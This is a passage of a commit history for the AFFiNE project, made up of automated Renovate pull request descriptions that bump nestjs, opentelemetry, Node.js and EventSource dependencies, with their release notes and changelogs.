merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNzkuMyIsInVwZGF0ZWRJblZlciI6IjQzLjE3OS4zIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
d9cebdfc95 |
chore: bump up nestjs (#14968)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@nestjs/common](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common)) | [`11.1.20` → `11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.20/11.1.21) |  |  | | [@nestjs/core](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core)) | [`11.1.20` → `11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.20/11.1.21) |  |  | | [@nestjs/platform-express](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express)) | [`11.1.20` → `11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.20/11.1.21) |  |  | | [@nestjs/platform-socket.io](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io)) | [`11.1.20` → `11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.20/11.1.21) |  |  | | [@nestjs/swagger](https://redirect.github.com/nestjs/swagger) | [`11.4.2` → `11.4.3`](https://renovatebot.com/diffs/npm/@nestjs%2fswagger/11.4.2/11.4.3) |  |  | | [@nestjs/websockets](https://redirect.github.com/nestjs/nest) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets)) | [`11.1.20` → `11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.20/11.1.21) |  |  | --- ### Release Notes <details> <summary>nestjs/nest (@​nestjs/common)</summary> ### [`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21) </details> <details> <summary>nestjs/nest (@​nestjs/core)</summary> ### [`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21) </details> <details> <summary>nestjs/nest (@​nestjs/platform-express)</summary> ### [`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21) </details> <details> <summary>nestjs/nest (@​nestjs/platform-socket.io)</summary> ### [`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21) </details> <details> <summary>nestjs/swagger (@​nestjs/swagger)</summary> ### [`v11.4.3`](https://redirect.github.com/nestjs/swagger/compare/11.4.2...0d79a3c9dea89236314609f8b18ec98b12c18692) [Compare Source](https://redirect.github.com/nestjs/swagger/compare/11.4.2...11.4.3) </details> <details> <summary>nestjs/nest (@​nestjs/websockets)</summary> ### [`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNzMuNiIsInVwZGF0ZWRJblZlciI6IjQzLjE3My42IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
97d9ae3183 |
chore: bump up @opentelemetry/semantic-conventions version to v1.41.1 (#14962)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@opentelemetry/semantic-conventions](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/semantic-conventions) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`1.40.0` → `1.41.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsemantic-conventions/1.40.0/1.41.1) |  |  | --- ### Release Notes <details> <summary>open-telemetry/opentelemetry-js (@​opentelemetry/semantic-conventions)</summary> ### [`v1.41.1`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/ed6bd6d5f3a1f68b65ae25b1a8aae9c285ae83de...013c60085b84351a4c1e4e4f79e3dd67c56661cd) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/ed6bd6d5f3a1f68b65ae25b1a8aae9c285ae83de...013c60085b84351a4c1e4e4f79e3dd67c56661cd) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNzMuNiIsInVwZGF0ZWRJblZlciI6IjQzLjE3My42IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
7280fe33bc |
chore: bump up Node.js to v22.22.3 (#14961)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [node](https://nodejs.org) ([source](https://redirect.github.com/nodejs/node)) | patch | `22.22.2` → `22.22.3` | --- ### Release Notes <details> <summary>nodejs/node (node)</summary> ### [`v22.22.3`](https://redirect.github.com/nodejs/node/releases/tag/v22.22.3): 2026-05-13, Version 22.22.3 'Jod' (LTS), @​marco-ippolito [Compare Source](https://redirect.github.com/nodejs/node/compare/v22.22.2...v22.22.3) ##### Commits - \[[`4f780905c5`](https://redirect.github.com/nodejs/node/commit/4f780905c5)] - **crypto**: fix potential null pointer dereference when BIO\_meth\_new() fails (Nora Dossche) [#​61788](https://redirect.github.com/nodejs/node/pull/61788) - \[[`4a09efb947`](https://redirect.github.com/nodejs/node/commit/4a09efb947)] - **crypto**: update root certificates to NSS 3.121 (Node.js GitHub Bot) [#​62485](https://redirect.github.com/nodejs/node/pull/62485) - \[[`e4c0d99839`](https://redirect.github.com/nodejs/node/commit/e4c0d99839)] - **deps**: update timezone to 2026a (Node.js GitHub Bot) [#​62164](https://redirect.github.com/nodejs/node/pull/62164) - \[[`0226c8dd7a`](https://redirect.github.com/nodejs/node/commit/0226c8dd7a)] - **deps**: update simdjson to 4.5.0 (Node.js GitHub Bot) [#​62382](https://redirect.github.com/nodejs/node/pull/62382) - \[[`e742ab748c`](https://redirect.github.com/nodejs/node/commit/e742ab748c)] - **deps**: update sqlite to 3.51.3 (Node.js GitHub Bot) [#​62256](https://redirect.github.com/nodejs/node/pull/62256) - \[[`73cac0571a`](https://redirect.github.com/nodejs/node/commit/73cac0571a)] - **deps**: update amaro to 1.1.8 (Node.js GitHub Bot) [#​62151](https://redirect.github.com/nodejs/node/pull/62151) - \[[`ae5c162b93`](https://redirect.github.com/nodejs/node/commit/ae5c162b93)] - **deps**: update amaro to 1.1.7 (Node.js GitHub Bot) [#​61730](https://redirect.github.com/nodejs/node/pull/61730) - \[[`b819cb9977`](https://redirect.github.com/nodejs/node/commit/b819cb9977)] - **deps**: update amaro to 1.1.6 (Node.js GitHub Bot) [#​61603](https://redirect.github.com/nodejs/node/pull/61603) - \[[`bbcce09dc7`](https://redirect.github.com/nodejs/node/commit/bbcce09dc7)] - **deps**: update sqlite to 3.52.0 (Node.js GitHub Bot) [#​62150](https://redirect.github.com/nodejs/node/pull/62150) - \[[`22ff2d81ce`](https://redirect.github.com/nodejs/node/commit/22ff2d81ce)] - **deps**: update simdjson to 4.3.1 (Node.js GitHub Bot) [#​61930](https://redirect.github.com/nodejs/node/pull/61930) - \[[`f49b51d75c`](https://redirect.github.com/nodejs/node/commit/f49b51d75c)] - **deps**: update acorn-walk to 8.3.5 (Node.js GitHub Bot) [#​61928](https://redirect.github.com/nodejs/node/pull/61928) - \[[`1a5cec0d49`](https://redirect.github.com/nodejs/node/commit/1a5cec0d49)] - **deps**: update acorn to 8.16.0 (Node.js GitHub Bot) [#​61925](https://redirect.github.com/nodejs/node/pull/61925) - \[[`d339497688`](https://redirect.github.com/nodejs/node/commit/d339497688)] - **deps**: update nbytes to 0.1.3 (Node.js GitHub Bot) [#​61879](https://redirect.github.com/nodejs/node/pull/61879) - \[[`3ff8ffd459`](https://redirect.github.com/nodejs/node/commit/3ff8ffd459)] - **deps**: remove stale OpenSSL arch configs (René) [#​61834](https://redirect.github.com/nodejs/node/pull/61834) - \[[`b8ddbc1e9a`](https://redirect.github.com/nodejs/node/commit/b8ddbc1e9a)] - **deps**: update llhttp to 9.3.1 (Node.js GitHub Bot) [#​61827](https://redirect.github.com/nodejs/node/pull/61827) - \[[`ffda97afd4`](https://redirect.github.com/nodejs/node/commit/ffda97afd4)] - **deps**: update googletest to [`2461743`](https://redirect.github.com/nodejs/node/commit/2461743991f9aa53e9a3625eafcbacd81a3c74cd) (Node.js GitHub Bot) [#​62484](https://redirect.github.com/nodejs/node/pull/62484) - \[[`79aa32cf4f`](https://redirect.github.com/nodejs/node/commit/79aa32cf4f)] - **deps**: update googletest to [`73a63ea`](https://redirect.github.com/nodejs/node/commit/73a63ea05dc8ca29ec1d2c1d66481dd0de1950f1) (Node.js GitHub Bot) [#​61927](https://redirect.github.com/nodejs/node/pull/61927) - \[[`b6957e13b6`](https://redirect.github.com/nodejs/node/commit/b6957e13b6)] - **deps**: update archs files for openssl-3.5.6 (Node.js GitHub Bot) [#​62629](https://redirect.github.com/nodejs/node/pull/62629) - \[[`3a27669063`](https://redirect.github.com/nodejs/node/commit/3a27669063)] - **deps**: upgrade openssl sources to openssl-3.5.6 (Node.js GitHub Bot) [#​62629](https://redirect.github.com/nodejs/node/pull/62629) - \[[`d568a1bb53`](https://redirect.github.com/nodejs/node/commit/d568a1bb53)] - **deps**: upgrade npm to 10.9.8 (npm team) [#​62463](https://redirect.github.com/nodejs/node/pull/62463) - \[[`ec11f3c1d5`](https://redirect.github.com/nodejs/node/commit/ec11f3c1d5)] - **deps**: V8: backport [`85b3900`](https://redirect.github.com/nodejs/node/commit/85b390089e51) (Thibaud Michaud) [#​62783](https://redirect.github.com/nodejs/node/pull/62783) - \[[`08609712ed`](https://redirect.github.com/nodejs/node/commit/08609712ed)] - **deps**: V8: backport [`1b27e46`](https://redirect.github.com/nodejs/node/commit/1b27e4674f11) (Thibaud Michaud) [#​62783](https://redirect.github.com/nodejs/node/pull/62783) - \[[`dcc60d5ab2`](https://redirect.github.com/nodejs/node/commit/dcc60d5ab2)] - **deps**: V8: backport [`9997fc0`](https://redirect.github.com/nodejs/node/commit/9997fc013952) (Thibaud Michaud) [#​62783](https://redirect.github.com/nodejs/node/pull/62783) - \[[`1d1f4451fb`](https://redirect.github.com/nodejs/node/commit/1d1f4451fb)] - **deps**: V8: cherry-pick [`b96e40d`](https://redirect.github.com/nodejs/node/commit/b96e40d5ac85) (Clemens Backes) [#​62783](https://redirect.github.com/nodejs/node/pull/62783) - \[[`2268567237`](https://redirect.github.com/nodejs/node/commit/2268567237)] - **deps**: V8: cherry-pick [`7cb6188`](https://redirect.github.com/nodejs/node/commit/7cb6188cf913) (Thibaud Michaud) [#​62783](https://redirect.github.com/nodejs/node/pull/62783) - \[[`92804cdbea`](https://redirect.github.com/nodejs/node/commit/92804cdbea)] - **deps**: V8: cherry-pick [`e7ccf0a`](https://redirect.github.com/nodejs/node/commit/e7ccf0af1bdd) (Thibaud Michaud) [#​62783](https://redirect.github.com/nodejs/node/pull/62783) - \[[`eae2c27a40`](https://redirect.github.com/nodejs/node/commit/eae2c27a40)] - **deps**: V8: cherry-pick [`8e214ec`](https://redirect.github.com/nodejs/node/commit/8e214ec3ec8c) (Thibaud Michaud) [#​62783](https://redirect.github.com/nodejs/node/pull/62783) - \[[`a1799a49bb`](https://redirect.github.com/nodejs/node/commit/a1799a49bb)] - **deps**: V8: backport [`63b8849`](https://redirect.github.com/nodejs/node/commit/63b8849d73ae) (Thibaud Michaud) [#​62783](https://redirect.github.com/nodejs/node/pull/62783) - \[[`a2df2d8731`](https://redirect.github.com/nodejs/node/commit/a2df2d8731)] - **deps**: V8: backport [`3239427`](https://redirect.github.com/nodejs/node/commit/323942700cfe) (Thibaud Michaud) [#​62783](https://redirect.github.com/nodejs/node/pull/62783) - \[[`e3d65c7dca`](https://redirect.github.com/nodejs/node/commit/e3d65c7dca)] - **deps**: V8: backport [`89dc6ea`](https://redirect.github.com/nodejs/node/commit/89dc6eab605c) (Thibaud Michaud) [#​62783](https://redirect.github.com/nodejs/node/pull/62783) - \[[`5e7db133de`](https://redirect.github.com/nodejs/node/commit/5e7db133de)] - **deps**: V8: backport [`910cb91`](https://redirect.github.com/nodejs/node/commit/910cb91733dc) (Jakob Kummerow) [#​62783](https://redirect.github.com/nodejs/node/pull/62783) - \[[`d0c24a28af`](https://redirect.github.com/nodejs/node/commit/d0c24a28af)] - **deps**: V8: cherry-pick [`b8f91e5`](https://redirect.github.com/nodejs/node/commit/b8f91e510e0f) (Thibaud Michaud) [#​62783](https://redirect.github.com/nodejs/node/pull/62783) - \[[`d358687824`](https://redirect.github.com/nodejs/node/commit/d358687824)] - **deps**: V8: cherry-pick [`cf03d55`](https://redirect.github.com/nodejs/node/commit/cf03d55db2a0) (Thibaud Michaud) [#​62783](https://redirect.github.com/nodejs/node/pull/62783) - \[[`67c8b2c349`](https://redirect.github.com/nodejs/node/commit/67c8b2c349)] - **deps**: V8: cherry-pick [`692f3d5`](https://redirect.github.com/nodejs/node/commit/692f3d526a38) (Sébastien Doeraene) [#​62783](https://redirect.github.com/nodejs/node/pull/62783) - \[[`71e5a59ffd`](https://redirect.github.com/nodejs/node/commit/71e5a59ffd)] - **deps**: V8: cherry-pick [`c734674`](https://redirect.github.com/nodejs/node/commit/c734674e03f9) (Manos Koukoutos) [#​62783](https://redirect.github.com/nodejs/node/pull/62783) - \[[`f0dbe81c7b`](https://redirect.github.com/nodejs/node/commit/f0dbe81c7b)] - **deps**: V8: cherry-pick [`b2f3aea`](https://redirect.github.com/nodejs/node/commit/b2f3aea23a01) (Thibaud Michaud) [#​62783](https://redirect.github.com/nodejs/node/pull/62783) - \[[`d333f480c3`](https://redirect.github.com/nodejs/node/commit/d333f480c3)] - **deps**: V8: cherry-pick [`5f1342c`](https://redirect.github.com/nodejs/node/commit/5f1342c20b59) (Matthias Liedtke) [#​62783](https://redirect.github.com/nodejs/node/pull/62783) - \[[`db722725bb`](https://redirect.github.com/nodejs/node/commit/db722725bb)] - **deps**: use npm undici\@​six tag in `update-undici.sh` (Matteo Collina) [#​63012](https://redirect.github.com/nodejs/node/pull/63012) - \[[`9b57979d9c`](https://redirect.github.com/nodejs/node/commit/9b57979d9c)] - **doc**: add Rafael to last security release steward (Rafael Gonzaga) [#​62423](https://redirect.github.com/nodejs/node/pull/62423) - \[[`d8075585bf`](https://redirect.github.com/nodejs/node/commit/d8075585bf)] - **doc**: add path to vulnerabilities.json mention (Rafael Gonzaga) [#​62355](https://redirect.github.com/nodejs/node/pull/62355) - \[[`6ec9a70204`](https://redirect.github.com/nodejs/node/commit/6ec9a70204)] - **doc**: clarify fs.ReadStream and fs.WriteStream are not constructable (Kit Dallege) [#​62208](https://redirect.github.com/nodejs/node/pull/62208) - \[[`1fc86fcb6e`](https://redirect.github.com/nodejs/node/commit/1fc86fcb6e)] - **doc**: add note (and caveat) for `mock.module` about customization hooks (Jacob Smith) [#​62075](https://redirect.github.com/nodejs/node/pull/62075) - \[[`491be80bd9`](https://redirect.github.com/nodejs/node/commit/491be80bd9)] - **doc**: add efekrskl as triager (Efe) [#​61876](https://redirect.github.com/nodejs/node/pull/61876) - \[[`18558293a3`](https://redirect.github.com/nodejs/node/commit/18558293a3)] - **doc**: fix module.stripTypeScriptTypes indentation (René) [#​61992](https://redirect.github.com/nodejs/node/pull/61992) - \[[`8e20976522`](https://redirect.github.com/nodejs/node/commit/8e20976522)] - **doc**: explicitly mention Slack handle (Rafael Gonzaga) [#​61986](https://redirect.github.com/nodejs/node/pull/61986) - \[[`70b8e6b4fb`](https://redirect.github.com/nodejs/node/commit/70b8e6b4fb)] - **doc**: rename invalid `function` parameter (René) [#​61942](https://redirect.github.com/nodejs/node/pull/61942) - \[[`4045c76f6c`](https://redirect.github.com/nodejs/node/commit/4045c76f6c)] - **doc**: clarify status of feature request issues (Antoine du Hamel) [#​61505](https://redirect.github.com/nodejs/node/pull/61505) - \[[`c54652f2aa`](https://redirect.github.com/nodejs/node/commit/c54652f2aa)] - **doc**: remove incorrect mention of `module` in `typescript.md` (Rob Palmer) [#​61839](https://redirect.github.com/nodejs/node/pull/61839) - \[[`9fad6cedf5`](https://redirect.github.com/nodejs/node/commit/9fad6cedf5)] - **doc**: clarify async caveats for `events.once()` (René) [#​61572](https://redirect.github.com/nodejs/node/pull/61572) - \[[`2f1e5733fe`](https://redirect.github.com/nodejs/node/commit/2f1e5733fe)] - **doc**: update Juan's security steward info (Juan José) [#​61754](https://redirect.github.com/nodejs/node/pull/61754) - \[[`a64bdb5068`](https://redirect.github.com/nodejs/node/commit/a64bdb5068)] - **doc**: fix overstated Date header requirement in response.sendDate (Kit Dallege) [#​62206](https://redirect.github.com/nodejs/node/pull/62206) - \[[`02797de923`](https://redirect.github.com/nodejs/node/commit/02797de923)] - **doc**: fix small environment\_variables typo (chris) [#​62279](https://redirect.github.com/nodejs/node/pull/62279) - \[[`f22ebdc809`](https://redirect.github.com/nodejs/node/commit/f22ebdc809)] - **doc**: fix small logic error in DETECT\_MODULE\_SYNTAX (René) [#​62025](https://redirect.github.com/nodejs/node/pull/62025) - \[[`9f4508062a`](https://redirect.github.com/nodejs/node/commit/9f4508062a)] - **doc**: fix methods being documented as properties in `process.md` (Antoine du Hamel) [#​61765](https://redirect.github.com/nodejs/node/pull/61765) - \[[`3ea39ff135`](https://redirect.github.com/nodejs/node/commit/3ea39ff135)] - **doc**: fix dropdown menu being obscured at <600px due to stacking context (Jeff) [#​61735](https://redirect.github.com/nodejs/node/pull/61735) - \[[`c22445079b`](https://redirect.github.com/nodejs/node/commit/c22445079b)] - **doc**: fix spacing in process message event (Aviv Keller) [#​61756](https://redirect.github.com/nodejs/node/pull/61756) - \[[`32831b5223`](https://redirect.github.com/nodejs/node/commit/32831b5223)] - **doc**: fix broken links of net.md (YuSheng Chen) [#​61673](https://redirect.github.com/nodejs/node/pull/61673) - \[[`005508d509`](https://redirect.github.com/nodejs/node/commit/005508d509)] - **doc**: remove obsolete Boxstarter automated install (Mike McCready) [#​61785](https://redirect.github.com/nodejs/node/pull/61785) - \[[`37c2fd6f7d`](https://redirect.github.com/nodejs/node/commit/37c2fd6f7d)] - **esm**: fix path normalization in `finalizeResolution` (Antoine du Hamel) [#​62080](https://redirect.github.com/nodejs/node/pull/62080) - \[[`1769d74613`](https://redirect.github.com/nodejs/node/commit/1769d74613)] - **esm**: populate separate cache for require(esm) in imported CJS (Joyee Cheung) [#​59679](https://redirect.github.com/nodejs/node/pull/59679) - \[[`ee02966ffc`](https://redirect.github.com/nodejs/node/commit/ee02966ffc)] - **http**: fix keep-alive socket reuse race in requestOnFinish (Martin Slota) [#​61710](https://redirect.github.com/nodejs/node/pull/61710) - \[[`2fdb5ce6cc`](https://redirect.github.com/nodejs/node/commit/2fdb5ce6cc)] - **http2**: fix FileHandle leak in respondWithFile (sangwook) [#​61707](https://redirect.github.com/nodejs/node/pull/61707) - \[[`aa2c1eca04`](https://redirect.github.com/nodejs/node/commit/aa2c1eca04)] - **lib**: fix source map url parse in dynamic imports (Chengzhong Wu) [#​61990](https://redirect.github.com/nodejs/node/pull/61990) - \[[`785b00cbeb`](https://redirect.github.com/nodejs/node/commit/785b00cbeb)] - **meta**: pass release version to release worker (flakey5) [#​62777](https://redirect.github.com/nodejs/node/pull/62777) - \[[`447fb9a0b5`](https://redirect.github.com/nodejs/node/commit/447fb9a0b5)] - **meta**: persist sccache daemon until end of build workflows (René) [#​61639](https://redirect.github.com/nodejs/node/pull/61639) - \[[`5065a0acb3`](https://redirect.github.com/nodejs/node/commit/5065a0acb3)] - **module**: do not invoke resolve hooks twice for imported cjs (Joyee Cheung) [#​61529](https://redirect.github.com/nodejs/node/pull/61529) - \[[`9a2e21305d`](https://redirect.github.com/nodejs/node/commit/9a2e21305d)] - **module**: do not wrap module.\_load when tracing is not enabled (Joyee Cheung) [#​61479](https://redirect.github.com/nodejs/node/pull/61479) - \[[`b9240bc063`](https://redirect.github.com/nodejs/node/commit/b9240bc063)] - **module**: fix sync resolve hooks for require with node: prefixes (Joyee Cheung) [#​61088](https://redirect.github.com/nodejs/node/pull/61088) - \[[`2e91b28aaf`](https://redirect.github.com/nodejs/node/commit/2e91b28aaf)] - **module**: handle null source from async loader hooks in sync hooks (Joyee Cheung) [#​59929](https://redirect.github.com/nodejs/node/pull/59929) - \[[`39147c154e`](https://redirect.github.com/nodejs/node/commit/39147c154e)] - **module**: use sync cjs when importing cts (Marco Ippolito) [#​60072](https://redirect.github.com/nodejs/node/pull/60072) - \[[`12a2462b2c`](https://redirect.github.com/nodejs/node/commit/12a2462b2c)] - **module**: only put directly require-d ESM into require.cache (Joyee Cheung) [#​59874](https://redirect.github.com/nodejs/node/pull/59874) - \[[`cf39566277`](https://redirect.github.com/nodejs/node/commit/cf39566277)] - **src**: fix flags argument offset in JSUdpWrap (Weixie Cui) [#​61948](https://redirect.github.com/nodejs/node/pull/61948) - \[[`578a9a9230`](https://redirect.github.com/nodejs/node/commit/578a9a9230)] - **src**: clamp WriteUtf8 capacity to INT\_MAX in EncodeInto (semimikoh) [#​62621](https://redirect.github.com/nodejs/node/pull/62621) - \[[`57c3035fec`](https://redirect.github.com/nodejs/node/commit/57c3035fec)] - **stream**: fix decoded fromList chunk boundary check (Thomas Watson) [#​61884](https://redirect.github.com/nodejs/node/pull/61884) - \[[`57fb008bb8`](https://redirect.github.com/nodejs/node/commit/57fb008bb8)] - **test**: update tls junk data error expectations (Filip Skokan) [#​62629](https://redirect.github.com/nodejs/node/pull/62629) - \[[`363f9a9d18`](https://redirect.github.com/nodejs/node/commit/363f9a9d18)] - **test**: skip `test-url` on `--shared-ada` builds (Antoine du Hamel) [#​62019](https://redirect.github.com/nodejs/node/pull/62019) - \[[`daaead342b`](https://redirect.github.com/nodejs/node/commit/daaead342b)] - **test**: simplify encodeInto large buffer regression test (semimikoh) [#​62621](https://redirect.github.com/nodejs/node/pull/62621) - \[[`ecfa766b41`](https://redirect.github.com/nodejs/node/commit/ecfa766b41)] - **tools**: fix auto-start-ci (Antoine du Hamel) [#​61900](https://redirect.github.com/nodejs/node/pull/61900) - \[[`17c0a610af`](https://redirect.github.com/nodejs/node/commit/17c0a610af)] - **tools**: fix parsing of commit trailers in `lint-release-proposal` GHA (Antoine du Hamel) [#​62077](https://redirect.github.com/nodejs/node/pull/62077) - \[[`89ad7dc63b`](https://redirect.github.com/nodejs/node/commit/89ad7dc63b)] - **tools**: enforce removal of `lts-watch-*` labels on release proposals (Antoine du Hamel) [#​61672](https://redirect.github.com/nodejs/node/pull/61672) - \[[`5f9bb8ef0c`](https://redirect.github.com/nodejs/node/commit/5f9bb8ef0c)] - **tools**: revert tools GHA workflow to ubuntu-latest (Richard Lau) [#​62024](https://redirect.github.com/nodejs/node/pull/62024) - \[[`977ef80ac1`](https://redirect.github.com/nodejs/node/commit/977ef80ac1)] - **url**: process crash via malformed UNC hostname in pathToFileURL() (Nicola Del Gobbo) [#​62574](https://redirect.github.com/nodejs/node/pull/62574) - \[[`ad8f518a81`](https://redirect.github.com/nodejs/node/commit/ad8f518a81)] - **zlib**: fix use-after-free when reset() is called during write (Matteo Collina) [#​62325](https://redirect.github.com/nodejs/node/pull/62325) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNzMuNiIsInVwZGF0ZWRJblZlciI6IjQzLjE3My42IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
419fc5d5e0 |
chore: bump up Recouse/EventSource version to from: "0.1.8" (#14960)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [Recouse/EventSource](https://redirect.github.com/Recouse/EventSource) | patch | `from: "0.1.7"` → `from: "0.1.8"` | --- ### Release Notes <details> <summary>Recouse/EventSource (Recouse/EventSource)</summary> ### [`v0.1.8`](https://redirect.github.com/Recouse/EventSource/releases/tag/0.1.8) [Compare Source](https://redirect.github.com/Recouse/EventSource/compare/0.1.7...0.1.8) #### What's Changed - Fix O(n²) performance in ServerEventParser.parse() by [@​liefran-sim](https://redirect.github.com/liefran-sim) in [#​49](https://redirect.github.com/Recouse/EventSource/pull/49) #### New Contributors - [@​liefran-sim](https://redirect.github.com/liefran-sim) made their first contribution in [#​49](https://redirect.github.com/Recouse/EventSource/pull/49) **Full Changelog**: <https://github.com/Recouse/EventSource/compare/0.1.7...0.1.8> </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNzMuNiIsInVwZGF0ZWRJblZlciI6IjQzLjE3My42IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
2b22fe4692 |
chore: bump up nestjs (#13791)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@nestjs/apollo](https://redirect.github.com/nestjs/graphql) | [`13.2.4` → `13.4.0`](https://renovatebot.com/diffs/npm/@nestjs%2fapollo/13.2.4/13.4.0) |  |  | | [@nestjs/common](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common)) | [`11.1.18` → `11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.18/11.1.20) |  |  | | [@nestjs/core](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core)) | [`11.1.18` → `11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.18/11.1.20) |  |  | | [@nestjs/graphql](https://redirect.github.com/nestjs/graphql) | [`13.2.5` → `13.4.0`](https://renovatebot.com/diffs/npm/@nestjs%2fgraphql/13.2.5/13.4.0) |  |  | | [@nestjs/platform-express](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express)) | [`11.1.18` → `11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.18/11.1.20) |  |  | | 